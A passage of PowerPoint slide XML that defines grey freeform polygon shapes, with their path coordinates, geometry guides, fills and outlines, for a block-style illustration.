                            <a:pt x="0" y="2114"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="898" y="1873"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="896" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="241"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="828282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1" name="Freeform 10"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1072" y="2854"/>
                      <a:ext cx="424" cy="114"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 890"/>
                        <a:gd name="T1" fmla="*/ 120 h 238"/>
                        <a:gd name="T2" fmla="*/ 444 w 890"/>
                        <a:gd name="T3" fmla="*/ 0 h 238"/>
                        <a:gd name="T4" fmla="*/ 890 w 890"/>
                        <a:gd name="T5" fmla="*/ 120 h 238"/>
                        <a:gd name="T6" fmla="*/ 444 w 890"/>
                        <a:gd name="T7" fmla="*/ 238 h 238"/>
                        <a:gd name="T8" fmla="*/ 0 w 890"/>
                        <a:gd name="T9" fmla="*/ 120 h 23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890" h="238">
                          <a:moveTo>
                            <a:pt x="0" y="120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="444" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="890" y="120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="444" y="238"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="120"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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2" name="Freeform 11"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1504" y="1954"/>
                      <a:ext cx="642" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1349"/>
                        <a:gd name="T1" fmla="*/ 241 h 361"/>
                        <a:gd name="T2" fmla="*/ 895 w 1349"/>
                        <a:gd name="T3" fmla="*/ 0 h 361"/>
                        <a:gd name="T4" fmla="*/ 1349 w 1349"/>
                        <a:gd name="T5" fmla="*/ 120 h 361"/>
                        <a:gd name="T6" fmla="*/ 454 w 1349"/>
                        <a:gd name="T7" fmla="*/ 361 h 361"/>
                        <a:gd name="T8" fmla="*/ 0 w 1349"/>
                        <a:gd name="T9" fmla="*/ 241 h 36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349" h="361">
                          <a:moveTo>
                            <a:pt x="0" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="895" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1349" y="120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="361"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="241"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="6E6E6E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3" name="Freeform 12"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1288" y="2011"/>
                      <a:ext cx="642" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1349"/>
                        <a:gd name="T1" fmla="*/ 241 h 361"/>
                        <a:gd name="T2" fmla="*/ 895 w 1349"/>
                        <a:gd name="T3" fmla="*/ 0 h 361"/>
                        <a:gd name="T4" fmla="*/ 1349 w 1349"/>
                        <a:gd name="T5" fmla="*/ 123 h 361"/>
                        <a:gd name="T6" fmla="*/ 451 w 1349"/>
                        <a:gd name="T7" fmla="*/ 361 h 361"/>
                        <a:gd name="T8" fmla="*/ 0 w 1349"/>
                        <a:gd name="T9" fmla="*/ 241 h 36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349" h="361">
                          <a:moveTo>
                            <a:pt x="0" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="895" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1349" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="451" y="361"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="241"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="6E6E6E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4" name="Freeform 13"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1073" y="2070"/>
                      <a:ext cx="642" cy="171"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1349"/>
                        <a:gd name="T1" fmla="*/ 241 h 361"/>
                        <a:gd name="T2" fmla="*/ 898 w 1349"/>
                        <a:gd name="T3" fmla="*/ 0 h 361"/>
                        <a:gd name="T4" fmla="*/ 1349 w 1349"/>
                        <a:gd name="T5" fmla="*/ 120 h 361"/>
                        <a:gd name="T6" fmla="*/ 453 w 1349"/>
                        <a:gd name="T7" fmla="*/ 361 h 361"/>
                        <a:gd name="T8" fmla="*/ 0 w 1349"/>
                        <a:gd name="T9" fmla="*/ 241 h 36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349" h="361">
                          <a:moveTo>
                            <a:pt x="0" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="898" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1349" y="120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="361"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="241"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="6E6E6E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5" name="Freeform 14"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1930" y="2069"/>
                      <a:ext cx="216" cy="948"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 454"/>
                        <a:gd name="T1" fmla="*/ 0 h 1993"/>
                        <a:gd name="T2" fmla="*/ 0 w 454"/>
                        <a:gd name="T3" fmla="*/ 1873 h 1993"/>
                        <a:gd name="T4" fmla="*/ 454 w 454"/>
                        <a:gd name="T5" fmla="*/ 1993 h 1993"/>
                        <a:gd name="T6" fmla="*/ 454 w 454"/>
                        <a:gd name="T7" fmla="*/ 120 h 1993"/>
                        <a:gd name="T8" fmla="*/ 0 w 454"/>
                        <a:gd name="T9" fmla="*/ 0 h 199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4" h="1993">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1873"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="1993"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="12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454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6" name="Freeform 15"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1715" y="2126"/>
                      <a:ext cx="215" cy="950"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 451"/>
                        <a:gd name="T1" fmla="*/ 0 h 1996"/>
                        <a:gd name="T2" fmla="*/ 0 w 451"/>
                        <a:gd name="T3" fmla="*/ 1873 h 1996"/>
                        <a:gd name="T4" fmla="*/ 451 w 451"/>
                        <a:gd name="T5" fmla="*/ 1996 h 1996"/>
                        <a:gd name="T6" fmla="*/ 451 w 451"/>
                        <a:gd name="T7" fmla="*/ 123 h 1996"/>
                        <a:gd name="T8" fmla="*/ 0 w 451"/>
                        <a:gd name="T9" fmla="*/ 0 h 199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1996">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1873"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="451" y="1996"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="451" y="12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454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7" name="Freeform 16"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1285" y="2241"/>
                      <a:ext cx="215" cy="425"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 452"/>
                        <a:gd name="T1" fmla="*/ 0 h 891"/>
                        <a:gd name="T2" fmla="*/ 0 w 452"/>
                        <a:gd name="T3" fmla="*/ 770 h 891"/>
                        <a:gd name="T4" fmla="*/ 452 w 452"/>
                        <a:gd name="T5" fmla="*/ 891 h 891"/>
                        <a:gd name="T6" fmla="*/ 452 w 452"/>
                        <a:gd name="T7" fmla="*/ 123 h 891"/>
                        <a:gd name="T8" fmla="*/ 0 w 452"/>
                        <a:gd name="T9" fmla="*/ 0 h 89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2" h="891">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="770"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="452" y="891"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="452" y="12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454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8" name="Freeform 17"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1285" y="2911"/>
                      <a:ext cx="215" cy="280"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 452"/>
                        <a:gd name="T1" fmla="*/ 0 h 590"/>
                        <a:gd name="T2" fmla="*/ 0 w 452"/>
                        <a:gd name="T3" fmla="*/ 467 h 590"/>
                        <a:gd name="T4" fmla="*/ 452 w 452"/>
                        <a:gd name="T5" fmla="*/ 590 h 590"/>
                        <a:gd name="T6" fmla="*/ 452 w 452"/>
                        <a:gd name="T7" fmla="*/ 120 h 590"/>
                        <a:gd name="T8" fmla="*/ 0 w 452"/>
                        <a:gd name="T9" fmla="*/ 0 h 5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2" h="590">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="467"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="452" y="590"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="452" y="12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454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9" name="Freeform 18"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="858" y="2127"/>
                      <a:ext cx="642" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1349"/>
                        <a:gd name="T1" fmla="*/ 241 h 362"/>
                        <a:gd name="T2" fmla="*/ 896 w 1349"/>
                        <a:gd name="T3" fmla="*/ 0 h 362"/>
                        <a:gd name="T4" fmla="*/ 1349 w 1349"/>
                        <a:gd name="T5" fmla="*/ 123 h 362"/>
                        <a:gd name="T6" fmla="*/ 452 w 1349"/>
                        <a:gd name="T7" fmla="*/ 362 h 362"/>
                        <a:gd name="T8" fmla="*/ 0 w 1349"/>
                        <a:gd name="T9" fmla="*/ 241 h 36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349" h="362">
                          <a:moveTo>
                            <a:pt x="0" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="896" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1349" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="452" y="362"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="241"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="6E6E6E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0" name="Freeform 19"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="643" y="2185"/>
                      <a:ext cx="642" cy="173"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1348"/>
                        <a:gd name="T1" fmla="*/ 241 h 362"/>
                        <a:gd name="T2" fmla="*/ 897 w 1348"/>
                        <a:gd name="T3" fmla="*/ 0 h 362"/>
                        <a:gd name="T4" fmla="*/ 1348 w 1348"/>
                        <a:gd name="T5" fmla="*/ 121 h 362"/>
                        <a:gd name="T6" fmla="*/ 453 w 1348"/>
                        <a:gd name="T7" fmla="*/ 362 h 362"/>
                        <a:gd name="T8" fmla="*/ 0 w 1348"/>
                        <a:gd name="T9" fmla="*/ 241 h 36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348" h="362">
                          <a:moveTo>
                            <a:pt x="0" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="897" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1348" y="121"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="362"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="241"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="6E6E6E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1" name="Freeform 20"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1500" y="2184"/>
                      <a:ext cx="215" cy="949"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 453"/>
                        <a:gd name="T1" fmla="*/ 0 h 1993"/>
                        <a:gd name="T2" fmla="*/ 0 w 453"/>
                        <a:gd name="T3" fmla="*/ 1873 h 1993"/>
                        <a:gd name="T4" fmla="*/ 453 w 453"/>
                        <a:gd name="T5" fmla="*/ 1993 h 1993"/>
                        <a:gd name="T6" fmla="*/ 453 w 453"/>
                        <a:gd name="T7" fmla="*/ 120 h 1993"/>
                        <a:gd name="T8" fmla="*/ 0 w 453"/>
                        <a:gd name="T9" fmla="*/ 0 h 199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1993">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1873"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="1993"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="12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454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2" name="Freeform 21"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1069" y="2299"/>
                      <a:ext cx="216" cy="950"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 453"/>
                        <a:gd name="T1" fmla="*/ 0 h 1996"/>
                        <a:gd name="T2" fmla="*/ 0 w 453"/>
                        <a:gd name="T3" fmla="*/ 1875 h 1996"/>
                        <a:gd name="T4" fmla="*/ 453 w 453"/>
                        <a:gd name="T5" fmla="*/ 1996 h 1996"/>
                        <a:gd name="T6" fmla="*/ 453 w 453"/>
                        <a:gd name="T7" fmla="*/ 123 h 1996"/>
                        <a:gd name="T8" fmla="*/ 0 w 453"/>
                        <a:gd name="T9" fmla="*/ 0 h 199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1996">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="1996"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="12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454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3" name="Freeform 22"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="643" y="2243"/>
                      <a:ext cx="426" cy="1006"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 895 w 895"/>
                        <a:gd name="T1" fmla="*/ 0 h 2114"/>
                        <a:gd name="T2" fmla="*/ 895 w 895"/>
                        <a:gd name="T3" fmla="*/ 1873 h 2114"/>
                        <a:gd name="T4" fmla="*/ 0 w 895"/>
                        <a:gd name="T5" fmla="*/ 2114 h 2114"/>
                        <a:gd name="T6" fmla="*/ 0 w 895"/>
                        <a:gd name="T7" fmla="*/ 241 h 2114"/>
                        <a:gd name="T8" fmla="*/ 895 w 895"/>
                        <a:gd name="T9" fmla="*/ 0 h 211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895" h="2114">
                          <a:moveTo>
                            <a:pt x="895" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="895" y="1873"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2114"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="241"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="895" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="828282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79" name="Group 23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1290" y="2909"/>
                    <a:ext cx="869" cy="461"/>
                    <a:chOff x="1290" y="2907"/>
                    <a:chExt cx="869" cy="461"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="286" name="Group 24"/>
                    <p:cNvGrpSpPr>
                      <a:grpSpLocks noChangeAspect="1"/>
                    </p:cNvGrpSpPr>
                    <p:nvPr/>
                  </p:nvGrpSpPr>
                  <p:grpSpPr bwMode="auto">
                    <a:xfrm flipH="1">
                      <a:off x="1290" y="2907"/>
                      <a:ext cx="866" cy="461"/>
                      <a:chOff x="1144" y="3578"/>
                      <a:chExt cx="866" cy="461"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="299" name="Freeform 25"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1979" y="3638"/>
                        <a:ext cx="31" cy="234"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 12"/>
                          <a:gd name="T1" fmla="*/ 87 h 87"/>
                          <a:gd name="T2" fmla="*/ 12 w 12"/>
                          <a:gd name="T3" fmla="*/ 84 h 87"/>
                          <a:gd name="T4" fmla="*/ 12 w 12"/>
                          <a:gd name="T5" fmla="*/ 0 h 87"/>
                          <a:gd name="T6" fmla="*/ 0 w 12"/>
                          <a:gd name="T7" fmla="*/ 3 h 87"/>
                          <a:gd name="T8" fmla="*/ 0 w 12"/>
                          <a:gd name="T9" fmla="*/ 87 h 8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2" h="87">
                            <a:moveTo>
                              <a:pt x="0" y="87"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="12" y="84"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="3"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="87"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="80808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00" name="Freeform 26"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1946" y="3638"/>
                        <a:ext cx="33" cy="234"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 12 w 12"/>
                          <a:gd name="T1" fmla="*/ 87 h 87"/>
                          <a:gd name="T2" fmla="*/ 0 w 12"/>
                          <a:gd name="T3" fmla="*/ 84 h 87"/>
                          <a:gd name="T4" fmla="*/ 0 w 12"/>
                          <a:gd name="T5" fmla="*/ 0 h 87"/>
                          <a:gd name="T6" fmla="*/ 12 w 12"/>
                          <a:gd name="T7" fmla="*/ 3 h 87"/>
                          <a:gd name="T8" fmla="*/ 12 w 12"/>
                          <a:gd name="T9" fmla="*/ 87 h 8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2" h="87">
                            <a:moveTo>
                              <a:pt x="12" y="87"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="84"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="3"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="87"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="4D4D4D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01" name="Freeform 27"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1327" y="3805"/>
                        <a:ext cx="34" cy="234"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 12 w 12"/>
                          <a:gd name="T1" fmla="*/ 87 h 87"/>
                          <a:gd name="T2" fmla="*/ 0 w 12"/>
                          <a:gd name="T3" fmla="*/ 84 h 87"/>
                          <a:gd name="T4" fmla="*/ 0 w 12"/>
                          <a:gd name="T5" fmla="*/ 0 h 87"/>
                          <a:gd name="T6" fmla="*/ 12 w 12"/>
                          <a:gd name="T7" fmla="*/ 4 h 87"/>
                          <a:gd name="T8" fmla="*/ 12 w 12"/>
                          <a:gd name="T9" fmla="*/ 87 h 8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2" h="87">
                            <a:moveTo>
                              <a:pt x="12" y="87"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="84"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="4"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="87"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="80808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02" name="Freeform 28"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1361" y="3805"/>
                        <a:ext cx="30" cy="234"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 12"/>
                          <a:gd name="T1" fmla="*/ 87 h 87"/>
                          <a:gd name="T2" fmla="*/ 12 w 12"/>
                          <a:gd name="T3" fmla="*/ 84 h 87"/>
                          <a:gd name="T4" fmla="*/ 12 w 12"/>
                          <a:gd name="T5" fmla="*/ 0 h 87"/>
                          <a:gd name="T6" fmla="*/ 0 w 12"/>
                          <a:gd name="T7" fmla="*/ 4 h 87"/>
                          <a:gd name="T8" fmla="*/ 0 w 12"/>
                          <a:gd name="T9" fmla="*/ 87 h 8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2" h="87">
                            <a:moveTo>
                              <a:pt x="0" y="87"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="12" y="84"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="4"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="87"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="80808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03" name="Freeform 29"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1144" y="3755"/>
                        <a:ext cx="33" cy="234"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 12 w 12"/>
                          <a:gd name="T1" fmla="*/ 87 h 87"/>
                          <a:gd name="T2" fmla="*/ 0 w 12"/>
                          <a:gd name="T3" fmla="*/ 84 h 87"/>
                          <a:gd name="T4" fmla="*/ 0 w 12"/>
                          <a:gd name="T5" fmla="*/ 0 h 87"/>
                          <a:gd name="T6" fmla="*/ 12 w 12"/>
                          <a:gd name="T7" fmla="*/ 3 h 87"/>
                          <a:gd name="T8" fmla="*/ 12 w 12"/>
                          <a:gd name="T9" fmla="*/ 87 h 8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2" h="87">
                            <a:moveTo>
                              <a:pt x="12" y="87"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="84"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="3"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="87"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="80808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04" name="Freeform 30"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1177" y="3755"/>
                        <a:ext cx="31" cy="234"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 12"/>
                          <a:gd name="T1" fmla="*/ 87 h 87"/>
                          <a:gd name="T2" fmla="*/ 12 w 12"/>
                          <a:gd name="T3" fmla="*/ 84 h 87"/>
                          <a:gd name="T4" fmla="*/ 12 w 12"/>
                          <a:gd name="T5" fmla="*/ 0 h 87"/>
                          <a:gd name="T6" fmla="*/ 0 w 12"/>
                          <a:gd name="T7" fmla="*/ 3 h 87"/>
                          <a:gd name="T8" fmla="*/ 0 w 12"/>
                          <a:gd name="T9" fmla="*/ 87 h 8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2" h="87">
                            <a:moveTo>
                              <a:pt x="0" y="87"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="12" y="84"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="3"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="87"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="4D4D4D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05" name="Freeform 31"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
